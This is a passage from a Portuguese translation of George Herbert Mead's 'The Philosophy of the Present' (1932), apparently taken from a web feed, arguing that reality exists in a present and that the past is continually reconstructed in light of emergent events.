e que a exigência metafísica de um conjunto de eventos que esteja inalteravelmente presente em um passado irrevogável, ao qual essas histórias procuram aproximar-se continuamente, remete a motivos diversos daqueles em operação na pesquisa científica mais exata.&#xA;&#xA;Notas do Capítulo.&#xA;&#xA;  Estas páginas foram encontradas entre os papéis do Sr. Mead após sua morte. Parecem ter sido escritas mais tarde do que o capítulo ao qual estão aqui anexadas, possivelmente como resultado de uma discussão crítica a seu respeito em uma reunião do Philosophy Club da Universidade de Chicago em janeiro de 1931.&#xA;&#xA;As durações são um contínuo deslizar de presentes uns nos outros. O presente é uma passagem constituída por processos cujas fases anteriores determinam, em certos aspectos, suas fases posteriores. A realidade, então, está sempre em um presente. Quando o presente passou, ele já não é mais. Surge a questão de saber se o passado que emerge na memória e na projeção desta ainda mais para trás refere-se a eventos que existiram como tais presentes contínuos passando uns nos outros, ou àquela fase condicionante do presente em passagem que nos permite determinar a conduta com referência ao futuro que também está surgindo no presente. É esta última tese que sustento.&#xA;&#xA;A implicação de minha posição é que o passado é uma construção tal que a referência encontrada nele não é a eventos que possuam uma realidade independente do presente, que é a sede da realidade, mas antes a uma interpretação do presente em sua passagem condicionante que permitirá à conduta inteligente prosseguir. É naturalmente evidente que os materiais a partir dos quais esse passado é construído encontram-se no presente. Refiro-me às imagens da memória e às evidências por meio das quais construímos o passado, e ao fato de que qualquer reinterpretação da imagem que formamos do passado será encontrada em um presente e será julgada pelos caracteres lógicos e probatórios que tais dados possuem em um presente.&#xA;&#xA;Também é evidente que não há apelo possível a partir desses elementos em seu locus presente para um passado real que esteja desenrolado atrás de nós como um pergaminho e ao qual possamos recorrer para verificar nossas construções. Não estamos decifrando um manuscrito cujas passagens possam tornar-se inteligíveis em si mesmas e permanecer como apresentações seguras daquela porção do que ocorreu anteriormente, a serem suplementadas por construções finais posteriores de outras passagens.&#xA;&#xA;Não estamos contemplando um passado último e imutável que possa estar estendido atrás de nós em sua totalidade, sem estar sujeito a novas mudanças. Nossas reconstruções do passado variam em sua extensão, mas jamais contemplam a finalidade de seus resultados. Estão sempre sujeitas a reformulações concebíveis, diante da descoberta de novas evidências, e essa reformulação pode ser completa. Mesmo as imagens de memória mais vívidas podem estar erradas.&#xA;&#xA;Em suma, nossas certezas acerca do passado jamais são alcançadas por uma congruência entre o passado construído e um passado real independente dessa construção, embora carreguemos essa atitude no fundo de nossas mentes, porque de fato submetemos nossas reconstruções hipotéticas imediatas ao teste do passado aceito e as julgamos segundo sua concordância com o registro aceito; mas esse passado aceito situa-se em um presente e está ele próprio sujeito a possível reconstrução.&#xA;&#xA;Ora, é possível aceitar tudo isso, admitindo plenamente que nenhum item do passado aceito é definitivo, e ainda assim sustentar que permanece uma referência, em nossa formulação do evento passado, a algo que aconteceu e que jamais poderemos ressuscitar no conteúdo da realidade, algo que pertenceu ao evento no presente dentro do qual ocorreu.&#xA;&#xA;Isso equivale a dizer que existe atrás de nós um pergaminho de presentes transcorridos, ao qual nossas construções do passado se referem, embora sem a possibilidade de jamais alcançá-lo, e sem a expectativa de que nossas contínuas reconstruções se aproximem dele com precisão crescente. E isso me leva ao ponto em questão.&#xA;&#xA;Tal pergaminho, se fosse alcançado, não seria a descrição que nossos passados requerem. Se pudéssemos trazer de volta o presente transcorrido na realidade que lhe pertenceu, ele não nos serviria. Ele seria aquele presente e careceria precisamente daquele caráter que exigimos do passado, isto é, daquela construção da natureza condicionante da passagem agora presente que nos permite interpretar aquilo que está surgindo no futuro pertencente a este presente.&#xA;&#xA;Quando alguém recorda os dias de sua infância, não consegue entrar neles tal como então era, sem sua relação com aquilo em que se tornou; e, se pudesse — isto é, se pudesse reproduzir a experiência tal como então ocorreu —, não poderia utilizá-la, pois isso envolveria não estar no presente dentro do qual esse uso deve ocorrer. Uma sequência de presentes concebivelmente existentes enquanto presentes jamais constituiria um passado.&#xA;&#xA;Se então existe tal referência, ela não é a uma entidade que pudesse ajustar-se a qualquer passado, e não posso acreditar que a referência, no passado tal como experimentado, seja a algo que não possuísse a função ou o valor que em nossa experiência pertencem a um passado. Não estamos nos referindo a um evento passado real que não fosse o evento passado que buscamos.&#xA;&#xA;Outra maneira de dizer isso é que nossos passados são sempre mentais da mesma maneira que os futuros que se encontram diante de nós em nossa imaginação são mentais. Eles diferem, à parte suas posições sucessivas, em que as condições determinantes da interpretação e da conduta estão incorporadas no passado tal como ele é encontrado no presente, mas estão sujeitos ao mesmo teste de validade ao qual nossos futuros hipotéticos estão sujeitos. E a novidade de cada futuro exige um passado novo.&#xA;&#xA;Isso, contudo, deixa de lado um importante caráter de qualquer passado, e este é que nenhum passado que possamos construir pode ser tão adequado quanto a situação exige. Há sempre uma referência a um passado que não pode ser alcançado, e ainda assim consonante com a função e o significado de um passado.&#xA;&#xA;É sempre concebível que as implicações do presente fossem levadas mais longe do que de fato as levamos, e mais longe do que possivelmente podemos levá-las. Há sempre mais conhecimento que seria desejável para a solução de qualquer problema que nos confronta, mas que não podemos alcançar. Com a obtenção concebível desse conhecimento, sem dúvida construiríamos um passado mais verdadeiro em relação ao presente dentro do qual se encontram as implicações desse passado.&#xA;&#xA;E é a esse passado que há sempre uma referência dentro de cada passado que se apresenta imperfeitamente à nossa investigação. Se possuíssemos todo documento possível e todo monumento possível do período de Júlio César, sem dúvida teríamos uma imagem mais verdadeira do homem e do que ocorreu em sua época, mas seria uma verdade pertencente a este presente, e um presente posterior a reconstruiria do ponto de vista de sua própria natureza emergente.&#xA;&#xA;Podemos então conceber um passado que, em qualquer presente determinado, seria irrefutável. Na medida em que esse presente estivesse em questão, ele seria um passado final; e, se considerarmos atentamente o assunto, penso que é a esse passado que se refere aquilo que ultrapassa a formulação que o historiador pode fornecer e que somos propensos a supor ser um passado independente do presente.&#xA;&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>Por George Herbert Mead em <em>A Filosofia do Presente</em> (EUA, 1932)
</p>

<p>O tema desta conferência encontra-se na proposição de que a realidade existe em um presente. O presente, naturalmente, implica um passado e um futuro, e negamos existência a ambos. A sugestão de Whitehead de que, à medida que os presentes especiosos variam em extensão temporal, pode-se conceber um único presente capaz de abranger toda a realidade temporal, aparentemente nos deixaria a passagem, mas eliminaria o passado e o futuro. Seja o que mais fosse, isso não seria um presente, pois aquilo de que ele tivesse passado não teria deixado de existir, e aquilo que está por existir já estaria nesse presente inclusivo. Poder-se-ia duvidar se isso ainda preservaria o caráter da passagem, mas, em todo caso, a natureza essencial do presente e da existência teria desaparecido. Pois o que caracteriza um presente é o seu tornar-se e o seu desaparecer. Enquanto o clarão do meteoro atravessa nossos próprios presentes especiosos, ele está inteiramente ali, ainda que apenas por uma fração de minuto. Estender essa fração de minuto a todo o processo do qual ela é um fragmento, conferindo-lhe a mesma solidariedade de existência que o clarão possui na experiência, seria apagar sua natureza como evento. Tal conspecto da existência não seria um presente eterno, pois não seria um presente de modo algum. Tampouco seria uma existência. Pois uma realidade parmenidiana não existe. A existência envolve a não-existência; ela efetivamente ocorre. O mundo é um mundo de eventos.</p>

<p>Há pouco propósito ou proveito em estabelecer antinomias e derrubar uma por meio da outra, ou em relegar a permanência a um mundo subsistente e atemporal enquanto o evento, no qual nada existe além de passagem, é transformado no elemento substancial das coisas existentes. O caráter permanente que nos interessa é aquele que permanece na existência, e diante do qual a mudança também existe. Há, isto é, o passado que se expressa na irrevogabilidade, embora jamais tenha existido na experiência um passado que não tenha mudado com o passar das gerações. Os passados nos quais estamos envolvidos são ao mesmo tempo irrevogáveis e revogáveis. É inútil, ao menos para os propósitos da experiência, recorrer a um passado “real” dentro do qual fazemos descobertas constantes; pois esse passado deve ser contraposto a um presente no qual o emergente aparece, e o passado, que então precisa ser considerado do ponto de vista do emergente, torna-se um passado diferente. O emergente, quando aparece, é sempre encontrado como decorrente do passado, mas antes de aparecer ele não decorre do passado, por definição. É inútil insistir em caracteres universais ou eternos pelos quais eventos passados possam ser identificados independentemente de qualquer emergente, pois estes ou estão além de nossa formulação ou tornam-se tão vazios que não servem a nenhum propósito de identificação. A importância do infinito no pensamento matemático antigo e moderno ilustra essa impotência.</p>

<p>Permanece a possibilidade de empurrar toda a realidade efetiva para um mundo de eventos em um espaço-tempo minkowskiano que transcende nossos referenciais, e os caracteres dos eventos para um mundo de entidades subsistentes. Até que ponto tal concepção da realidade pode ser logicamente elaborada eu não pretenderei discutir. O que me parece interessante é o significado que um conceito como o de irrevogabilidade possui na experiência.</p>

<p>Não gastarei tempo nem retórica apresentando o quadro em movimento das histórias que sucederam umas às outras desde os mitos das eras primitivas até o relato de Eddington ou Jeans sobre “O Universo ao Nosso Redor”. Interessa apenas notar que a rapidez com que esses passados se sucedem aumentou continuamente com o aumento da exatidão crítica no estudo do passado. Há uma ausência completa de finalidade em tais apresentações. É, naturalmente, implicação de nosso método de pesquisa que o historiador, em qualquer campo da ciência, será capaz de reconstruir o que aconteceu como um relato autenticado do passado. Contudo, aguardamos com vivo interesse a reconstrução, no mundo que será, do mundo que foi, pois percebemos que o mundo que será não pode diferir do mundo que é sem reescrever o passado para o qual agora olhamos retrospectivamente.</p>

<p>E, no entanto, o caráter de irrevogabilidade jamais se perde. Aquilo que aconteceu foi além de qualquer possibilidade de recuperação e, seja o que tenha sido, seu deslizar para o passado parece colocá-lo além da influência de eventos emergentes em nossa própria conduta ou na natureza. É o “o que ele foi” que muda, e esse título aparentemente vazio de irrevogabilidade liga-se a ele, venha ele a tornar-se o que for. A importância de ser irrevogável liga-se ao “o que ele foi”, e o “o que ele foi” é precisamente aquilo que não é irrevogável. Há uma finalidade que acompanha o desaparecimento de cada evento. A toda descrição desse evento essa finalidade é acrescentada, mas toda a importância dessa finalidade pertence ao mesmo mundo da experiência ao qual essa descrição pertence.</p>

<p>Ora, contraposta a essa incidência evidente de finalidade em um presente está a suposição habitual de que o passado que nos determina está lá. A verdade é que o passado está lá, em sua certeza ou probabilidade, no mesmo sentido em que o enquadramento de nossos problemas está lá. Parto da suposição de que a cognição, e o pensamento como parte do processo cognitivo, é reconstrutiva, porque a reconstrução é essencial para a conduta de um ser inteligente no universo. Isso é apenas parte da proposição mais geral de que mudanças estão ocorrendo no universo e de que, como consequência dessas mudanças, o universo está se tornando um universo diferente. A inteligência é apenas um aspecto dessa mudança. Trata-se de uma mudança que é parte de um processo vivo contínuo que tende a manter-se. O que é peculiar à inteligência é que ela constitui uma mudança que envolve uma reorganização mútua, um ajuste no organismo e uma reconstituição do ambiente; pois, em seus termos mais elementares, qualquer mudança no organismo acarreta uma diferença de sensibilidade e de resposta, e uma diferença correspondente no ambiente. É dentro desse processo que surge a chamada inteligência consciente, pois a consciência é tanto a diferença que surge no ambiente em razão de sua relação com o organismo em seu processo orgânico de ajustamento quanto a diferença no organismo em razão da mudança que ocorreu no ambiente. Referimo-nos à primeira como significado, e à segunda como ideação. O reflexo do organismo no ambiente e o reflexo do ambiente no organismo são fases essenciais na manutenção do processo vital que constitui a inteligência consciente.</p>

<p>Considerarei o significado da consciência em uma conferência posterior. No momento, meu interesse é apenas localizar aquela atividade à qual a cognição pertence e da qual o pensamento é uma expressão. Estou distinguindo, em particular, aquela existência do mundo para o organismo individual e social que corresponde ao uso mais geral do termo consciência daquela situação que corresponde ao termo “consciência de”. É esta última que, a meu ver, conota cognição. A distinção entre ambas coincide com aquela que sugeri entre o problema e o seu contexto.</p>

<p>O contexto dentro do qual ocorre o ajustamento é essencial para esse ajustamento e se insere naquilo que pertence ao “campo da consciência”, tal como esse termo é geralmente utilizado — especialmente quando reconhecemos as implicações daquilo que está mais definidamente no campo da consciência. O termo “campo da percepção” às vezes é usado no mesmo sentido, mas é mais propenso a carregar consigo o valor de “percepção de” do que o termo “consciência”. Em outras palavras, no conhecimento há sempre a pressuposição de um mundo que está aí e que fornece a base para o processo inferencial e ideacional da cognição. Isso, naturalmente, restringe a cognição ou a “consciência de” àquilo que contém em si uma dimensão inferencial.</p>

<p>Ora, o mundo que está aí em sua relação com o organismo, e que estabelece as condições para o ajustamento do organismo e a consequente mudança nesse mundo e desse mundo, inclui o seu passado. Abordamos toda questão de caráter histórico com um certo aparato, que pode ser cuidadosamente definido, e esse material mais tecnicamente definido — documentos, testemunhos orais e vestígios históricos — sustenta um dado passado que se estende retroativamente a partir das memórias de ontem e de hoje, e que não colocamos em dúvida. Utilizamos esse aparato para responder hipoteticamente às questões históricas que nos pressionam e para testar nossas hipóteses quando estas foram elaboradas.</p>

<p>Compreende-se, naturalmente, que qualquer parte desse aparato e do passado no qual ele está inserido pode ela própria tornar-se objeto de dúvida, mas mesmo o ceticismo mais radical, em sua própria formulação, não consegue escapar da memória das palavras e ideias que formulam a doutrina cética.
Algum passado dado desse tipo está implicado nas questões referentes ao passado. E esse passado dado amplia o presente especioso. É verdade que o acordo último entre os significados de dois documentos pode residir na experiência de um presente especioso, mas apenas sob a suposição da comparação que anteriormente fizemos entre os documentos. Essa comparação se estende para trás de nós e permanece inquestionada até que alguém aponte nela um erro e assim a coloque em questão, mas então apenas com base no passado dele próprio e de outros.</p>

<p>Tomemos a engenhosa sugestão — creio que do pai de Gosse — de que Deus criou o mundo com seus fósseis e outras evidências de um passado remoto para pôr à prova a fé dos homens; e atualizemos a sugestão para meia hora atrás. Suponhamos que o mundo tenha vindo à existência, com sua estrutura presente exata, incluindo os chamados conteúdos de nossas mentes, há trinta minutos, e que tivéssemos alguma evidência ulterior, análoga às concepções fundamentalistas do Sr. Gosse, de que isso tivesse ocorrido. Poderíamos examinar a hipótese apenas à luz de algum passado que estivesse aí, por mais reduzido que ele tivesse se tornado. E esse passado se estende indefinidamente, pois nada o interrompe, uma vez que qualquer momento dele, sendo representado, possui o seu próprio passado, e assim sucessivamente.</p>

<p>O que queremos dizer, então, com a afirmação de que existiu algum passado real com todos os seus eventos, independentemente de qualquer presente, cujos conteúdos estamos lenta e imperfeitamente decifrando? Retornamos, naturalmente, às próprias correções que fazemos em nossa pesquisa histórica e ao grau mais elevado de evidência daquilo que foi descoberto em comparação com o que podia ser oferecido pela descrição descartada. Graus mais altos de probabilidade e evidências adicionais implicam que há ou houve alguma realidade ali que estamos trazendo à luz.</p>

<p>Há, portanto, uma referência palpável ao passado inquestionado por meio de cuja evidência investigamos e solucionamos os problemas que surgem. E o próprio fato a que me referi — o de que qualquer descrição aceita do passado, embora não esteja agora em questão, pode concebivelmente vir a ser posta em dúvida — parece implicar algum passado inquestionável que serviria de pano de fundo para a solução de todos os problemas concebíveis. Admitamos isso provisoriamente e façamos a pergunta ulterior: esse passado independente de qualquer presente entra de fato em nossas investigações — quero dizer, como uma pressuposição que desempenha algum papel em nosso pensamento? Se retirássemos essa pressuposição, nosso aparato e sua operação na pesquisa histórica seriam afetados de algum modo?</p>

<p>Certamente não, se nos ocuparmos apenas dos problemas com os quais os historiadores da história social ou científica se ocupam. Aqui a referência é sempre e exclusivamente ao passado dado do qual surgiu um problema; e os contornos do problema e os testes aos quais as hipóteses apresentadas são submetidas encontram-se nesse passado dado. Como vimos, esse passado dado pode ele próprio, em uma data posterior, ser afetado pela dúvida e trazido à discussão. E, no entanto, a possível dubiedade do passado dado não afeta de maneira alguma a empreitada. Esta é outra maneira de dizer que a dubiedade de todos os passados possíveis jamais entra no pensamento do historiador.</p>

<p>A única aproximação a tal entrada é a exigência de que todos os passados anteriores sejam explicados e incorporados à formulação mais recente. E cada passado anterior, na medida em que é reconstruído, é nessa mesma medida mostrado como incorreto. Nas implicações de nosso método parecemos aproximar-nos de uma formulação-limite, ainda que no infinito, que preencheria todas as lacunas e corrigiria todos os erros. Mas, se estamos fazendo correções, deve aparentemente existir alguma descrição que seja correta; e mesmo se contemplarmos um futuro indefinido de pesquisa científica empenhada nessa tarefa, jamais escapamos dessa implicação.</p>

<p>Há outra maneira de dizer isso: nosso trabalho de pesquisa é um trabalho de descoberta, e só podemos descobrir aquilo que está lá, quer o descubramos ou não. Penso, contudo, que esta última afirmação está errada, se se supõe que implica haver ou ter havido um passado independente de todos os presentes, pois pode haver — e sem dúvida há — em qualquer presente com seu próprio passado uma vasta quantidade de coisas que não descobrimos, e, ainda assim, aquilo que descobrimos ou deixamos de descobrir assumirá um significado diferente e terá uma estrutura diferente como evento quando visto de algum ponto de vista posterior.</p>

<p>Há erro semelhante na concepção da correção do erro passado e na sugestão de que ela implica o absolutamente correto, ainda que jamais o alcance? Refiro-me à correção “em si” de uma descrição de eventos, implícita em uma correção feita por um historiador posterior. Penso que a correção absoluta que se encontra no pensamento do historiador seria a apresentação completa do passado dado, se todas as suas implicações fossem desenvolvidas. Se pudéssemos conhecer tudo o que está implicado em nossas memórias, documentos e monumentos, e fôssemos capazes de controlar todo esse conhecimento, o historiador suporia possuir aquilo que é absolutamente correto.</p>

<p>Mas um historiador do tempo de Aristóteles, ampliando dessa maneira seu passado conhecido, teria alcançado um passado correto que estaria em total desacordo com o mundo conhecido da ciência moderna; e há apenas diferenças de grau entre tal comparação e aquelas que as mudanças devidas à pesquisa vêm produzindo em nossos passados ano após ano. Se estamos nos referindo a qualquer outra correção “em si”, ela deve ser ou a de uma realidade que, por definição, jamais poderia entrar em nossa experiência, ou a de uma meta no infinito na qual cessa o tipo de experiência em que nos encontramos.</p>

<p>É, naturalmente, possível supor que a experiência dentro da qual nos encontramos esteja incluída em algum mundo ou experiência que a transcenda. Meu único ponto é que tal suposição não desempenha papel algum em nossos juízos sobre a correção do passado. Podemos ter outras razões, teológicas ou metafísicas, para supor um passado real que pudesse ser dado em uma apresentação independente de qualquer presente, mas essa suposição não entra nos postulados nem na técnica de qualquer tipo de pesquisa histórica.</p>

<p>Embora a concepção de um passado irrevogável “em si” seja talvez o pano de fundo comum do pensamento, é interessante retornar à afirmação que fiz anteriormente de que o cientista pesquisador aguarda não apenas com equanimidade, mas também com vivo interesse, as mudanças fundamentais que pesquisas posteriores trarão às determinações mais exatas que hoje podemos fazer. A imagem que isso oferece é a de presentes deslizando uns nos outros, cada qual com um passado que lhe é referível, cada passado incorporando em si aqueles que o precederam e, em certa medida, reconstruindo-os a partir de seu próprio ponto de vista.</p>

<p>No momento em que tomamos esses presentes anteriores como existências separadas da apresentação deles como passados, eles deixam de ter significado para nós e perdem qualquer valor que possam ter para interpretar nosso próprio presente e determinar nossos futuros. Eles podem ser localizados na geometria do espaço-tempo de Minkowski, mas, mesmo sob essa suposição, só podem alcançar-nos por meio de nossos próprios referenciais ou perspectivas; e o mesmo seria verdadeiro sob as suposições de qualquer outra metafísica que localizasse a realidade do passado em passados independentes de qualquer presente.</p>

<p>Provavelmente se diria que a irrevogabilidade do passado está localizada em tal ordem metafísica, e é esse o ponto que desejo discutir. O historiador não duvida de que algo aconteceu. Sua dúvida é quanto ao que aconteceu. Ele também procede com a suposição de que, se pudesse dispor de todos os fatos ou dados, poderia determinar o que foi que aconteceu. Isto é, sua ideia de irrevogabilidade liga-se, como já afirmei, ao “o quê” que aconteceu, assim como ao desaparecimento do evento.</p>

<p>Mas, se há emergência, o reflexo disso no passado ocorre imediatamente. Há um novo passado, pois, a partir de cada nova ascensão, a paisagem que se estende atrás de nós torna-se uma paisagem diferente. A analogia é falha porque as alturas estão ali, e os aspectos das paisagens que elas revelam também estão ali e poderiam ser reconstruídos a partir do presente do viajante, se ele tivesse diante de si todas as implicações de seu presente; ao passo que o emergente não está ali de antemão e, por definição, não poderia ser incluído nem mesmo na apresentação mais completa do presente. A realidade metafísica sugerida pela expressão de Eddington de que nossa experiência é uma aventura da mente na geometria ordenada do espaço-tempo corresponderia, contudo, a uma paisagem preexistente.</p>

<p>Há, naturalmente, a doutrina alternativa de Whitehead, segundo a qual as perspectivas existem na natureza como sistemas temporais que se intersectam, produzindo assim não apenas diferentes presentes, mas também diferentes passados que lhes correspondem. Não consigo ver, entretanto, como Whitehead, com a geometria fixa do espaço-tempo que ele aceita, pode escapar de uma ordem fixa de eventos, ainda que o “o quê” desses eventos dependa da ingressão de objetos eternos surgidos por meio da ação de Deus, dando assim origem à emergência.</p>

<p>O ponto em questão é saber se a necessidade com a qual o cientista lida é uma necessidade que determina o presente a partir de um passado independente desse ou de qualquer presente. Um espaço-tempo ordenado envolve tal necessidade metafísica. Desse ponto de vista, os diferentes passados da experiência são reinterpretações subjetivas, e o físico não está interessado em torná-los parte do esquema total dos eventos. A filosofia de Whitehead é uma tentativa valente de harmonizar esse tipo de necessidade geométrica com a emergência e com as diferenças entre perspectivas variadas. Não acredito que isso possa ser realizado, mas estou mais interessado na resposta à questão de saber se a necessidade envolvida nas relações entre presente e passado deriva de tal necessidade metafísica, isto é, de uma necessidade independente de qualquer presente.</p>

<p>Retorno aqui à minha proposição original de que uma realidade que transcende o presente deve manifestar-se no presente. Essa alternativa é aquela encontrada na atitude do cientista pesquisador, quer ele a reconheça em sua doutrina ou não. Ela consiste em que há e sempre haverá uma relação necessária entre o passado e o presente, mas que o presente no qual o emergente aparece aceita aquilo que é novo como parte essencial do universo e, desse ponto de vista, reescreve seu passado. O emergente então deixa de ser um emergente e passa a decorrer do passado que substituiu o passado anterior.</p>

<p>Falamos da vida e da consciência como emergentes, mas nossas naturezas racionalistas jamais ficarão satisfeitas enquanto não tivermos concebido um universo no qual elas surjam inevitavelmente daquilo que as precedeu. Não conseguimos fazer do emergente uma parte da relação pensante entre passado e presente e, mesmo quando aparentemente o aceitamos, levamos a bioquímica e a psicologia behaviorista tão longe quanto podemos no esforço de reduzir a emergência a um ponto evanescente. Mas, mesmo concedendo ao cientista pesquisador uma vitória completa — um universo inteiramente racionalizado, dentro do qual haja uma ordem determinada — ele ainda aguardará o aparecimento de novos problemas que emergirão em novos presentes para serem novamente racionalizados com outro passado, o qual incorporará harmoniosamente o antigo passado em si mesmo.</p>

<p>Reconhecidamente, a racionalidade completa do universo baseia-se em uma indução, e aquilo em que essa indução se fundamenta é um ponto controverso na doutrina filosófica. Admitida qualquer razão justificável para acreditar nela, todas as nossas correlações a fortalecem enormemente. Mas existe tal razão? Nesse ponto crucial há a maior incerteza. Evidentemente, o procedimento do cientista ignora isso. Para ele, não se trata de uma questão controversa. Não é, de modo algum, uma questão em seu procedimento. Ele está simplesmente ocupado em encontrar uma ordem racional e em estendê-la retrospectivamente, para que possa prever o futuro.</p>

<p>É aqui que seu mundo dado funciona. Se ele consegue ajustar sua hipótese a esse mundo e se ela antecipa aquilo que ocorre, então ela se torna a descrição do que aconteceu. Se fracassa, outra hipótese a substitui e outro passado substitui aquele que a primeira hipótese implicava.</p>

<p>Em suma, o passado (ou a estrutura significativa do passado) é tão hipotético quanto o futuro. O relato de Jeans sobre o que vem ocorrendo no interior de Aldebarã ou de Sírius Menor durante os últimos milhões de anos é muito mais hipotético do que o catálogo do astrônomo acerca dos eclipses que ocorrerão no próximo século e dos lugares onde serão visíveis. E a suposição metafísica de que houve um passado definido de eventos nada acrescenta nem subtrai da segurança de qualquer hipótese que ilumine nosso presente.</p>

<p>Ela oferece, de fato, a forma vazia dentro da qual estendemos qualquer hipótese e desenvolvemos suas implicações, mas não possui sequer a fixidez que Kant encontrou em suas formas da intuição. Os paradoxos da relatividade, aquilo que Whitehead denomina os diferentes significados do tempo em diferentes sistemas temporais, revelam a natureza hipotética dos esquemas regulados do passado dentro dos quais devemos encaixar os eventos que nossas teorias físicas desenrolam atrás de nós.</p>

<p>Podemos recorrer ao espaço-tempo absoluto com suas coincidências de eventos e os intervalos entre eles, mas mesmo aqui permanece discutível se essa interpretação das transformações de um referencial para outro é definitiva, se alcançamos a estrutura última do universo físico ou apenas um aparato matemático mais poderoso para atingir maior exatidão em medições e cálculos, cuja interpretação variará com a história da física matemática. O espaço-tempo de Minkowski é tão hipotético quanto a constituição ondulatória da matéria proposta por de Broglie.</p>

<p>Mas a irrevogabilidade do evento passado permanece mesmo que estejamos incertos quanto ao que foi o evento passado. Nem mesmo o caráter reversível dos processos físicos que as equações matemáticas parecem revelar abala esse caráter da experiência temporal. Pode-se conceber que, visto de uma enorme distância, a ordem de alguns daqueles que chamamos de mesmos eventos possa diferir em diferentes perspectivas, mas, dentro de qualquer perspectiva, aquilo que passou não pode recorrer. Nessa perspectiva, o que aconteceu aconteceu, e qualquer teoria apresentada deve abrir espaço para essa ordem dentro dessa perspectiva.</p>

<p>Há uma direção temporal inalterável naquilo que está ocorrendo e, se pudermos vincular outros processos a essa passagem, poderemos atribuir-lhes tanta certeza quanto o grau dessa vinculação justificar. Dado um certo valor para a velocidade de um corpo em movimento em determinado referencial, podemos determinar onde o corpo necessariamente estará. Nosso problema consiste em determinar exatamente o que precedeu aquilo que está ocorrendo, para que a direção do progresso temporal possa determinar o que o mundo virá a ser.</p>

<p>Há um certo processo temporal em curso na experiência. Aquilo que ocorreu desemboca naquilo que está ocorrendo, e, nessa passagem, o que ocorreu determina espaço-temporalmente aquilo que está passando para o futuro. Assim, na medida em que possamos determinar as constantes do movimento, podemos seguir essa determinação, e nossa análise procura resolver o acontecimento, tanto quanto possível, em movimento. Em geral, uma vez que a própria passagem é dada na experiência, a direção das mudanças em curso condiciona parcialmente aquilo que ocorrerá.</p>

<p>O evento que ocorreu e a direção do processo em andamento formam a base para a determinação racional do futuro. O passado irrevogável e a mudança em curso são os dois fatores aos quais vinculamos todas as nossas especulações a respeito do futuro. A probabilidade encontra-se no caráter do processo que está ocorrendo na experiência. Contudo, por mais avidamente que busquemos estruturas espaço-temporais que tragam consigo resultados dedutíveis, ainda assim reconhecemos relações entre as coisas em seus processos que não podem ser resolvidas em elementos quantitativos; e, embora tanto quanto possível as correlacionemos com caracteres mensuráveis, reconhecemo-las, em todo caso, como condições determinantes daquilo que está ocorrendo.</p>

<p>Buscamos seus antecedentes no passado e julgamos o futuro pela relação desse passado com aquilo que está ocorrendo. Todas essas relações dentro do processo em curso são relações determinantes daquilo que será, embora a forma específica dessa determinação constitua o problema científico de qualquer situação particular. A efetividade da determinação dentro da passagem da experiência direta é aquilo que Hume, por meio de suas pressuposições e de seu tipo de análise, eliminou da experiência, e é também aquilo que confere à dedução kantiana das categorias a validade que ela possui.</p>

<p>É tarefa da filosofia contemporânea colocar em congruência, de um lado, essa universalidade da determinação, que constitui o texto da ciência moderna, e, de outro, a emergência do novo, que pertence não apenas à experiência dos organismos sociais humanos, mas também é encontrada em uma natureza que a ciência e a filosofia que a seguiu separaram da natureza humana. A dificuldade que imediatamente se apresenta é que o emergente mal apareceu e já começamos a racionalizá-lo; isto é, procuramos mostrar que ele, ou ao menos as condições que determinam sua aparição, podem ser encontradas no passado que estava por trás dele.</p>

<p>Assim, os passados anteriores dos quais ele emergiu como algo que não o envolvia são incorporados em um passado mais abrangente que efetivamente conduz até ele. Ora, o que isso significa é que tudo o que acontece, inclusive o emergente, acontece sob condições determinantes — especialmente, do ponto de vista das ciências exatas, sob condições espaço-temporais que conduzem a conclusões dedutíveis acerca do que ocorrerá dentro de certos limites, mas também sob condições determinantes de natureza qualitativa, cujas garantias residem apenas na probabilidade —, embora essas condições jamais determinem completamente o “o que é” daquilo que ocorrerá.</p>

<p>A água, distinta das combinações de oxigênio e hidrogênio, pode surgir. A vida e a chamada consciência podem surgir. E os quanta podem surgir, embora se possa argumentar que tal surgimento se encontra em um “nível” diferente daquele da vida e da consciência. Quando esses emergentes apareceram, tornaram-se parte das condições determinantes que ocorrem em presentes reais, e estamos particularmente interessados em apresentar o passado que, na situação diante de nós, condicionou o aparecimento do emergente, especialmente de tal maneira que possamos conduzir a novas aparições desse objeto.</p>

<p>Orientamo-nos não com referência ao passado que foi um presente dentro do qual o emergente apareceu, mas em direção a uma reformulação do passado enquanto condicionante do futuro, para que possamos controlar seu reaparecimento. Quando a vida apareceu, pudemos reproduzir vida; e, dada a consciência, podemos controlar sua aparição e suas manifestações. Mesmo a descrição do passado dentro do qual o emergente apareceu é inevitavelmente feita do ponto de vista de um mundo dentro do qual o próprio emergente é tanto um fator condicionante quanto condicionado.</p>

<p>Não poderíamos trazer de volta esses presentes passados simplesmente tal como ocorreram — se é que estamos justificados em usar essa expressão — exceto como presentes. Uma apresentação exaustiva deles equivaleria apenas a revivê-los. Isto é, um presente deslizando para outro não conota aquilo que se entende por passado. Mas mesmo essa afirmação implica que houve tais presentes deslizando uns nos outros e, quer os consideremos desse ponto de vista ou não, parecemos implicar sua realidade enquanto tais, como a estrutura dentro da qual deve situar-se o tipo de passado que nos interessa, se ele é um aspecto do passado real.</p>

<p>Deixando de lado as ambiguidades que tal afirmação contém, o que quero enfatizar é que a irrevogabilidade do passado não deriva dessa concepção do passado. Pois, em nosso uso do termo irrevogabilidade, estamos apontando para aquilo que deve ter sido, e é uma estrutura e um processo no presente que constituem a fonte dessa necessidade. Certamente não podemos retornar a tal passado e testar nossas conjecturas por meio da inspeção efetiva de seus eventos em seu acontecer. Testamos nossas conjecturas acerca do passado pelas direções condicionantes do presente e pelos acontecimentos posteriores no futuro, os quais devem ser de certo tipo se o passado que concebemos realmente existiu.</p>

<p>A força da irrevogabilidade encontra-se, então, na extensão da necessidade com que aquilo que acaba de acontecer condiciona aquilo que está emergindo no futuro. O que ultrapassa isso pertence a um quadro metafísico que não tem interesse nos passados que surgem atrás de nós.</p>

<p>Na análise que empreendi, chegamos então, primeiro, à passagem dentro da qual aquilo que está ocorrendo condiciona aquilo que está surgindo. Tudo o que ocorre acontece sob condições necessárias. Em segundo lugar, essas condições, embora necessárias, não determinam em sua plena realidade aquilo que emerge. Estamos obtendo interessantes reflexos dessa situação a partir da crítica que o cientista faz de seus próprios métodos de alcançar a determinação exata da posição e da velocidade e das implicações dos quanta.</p>

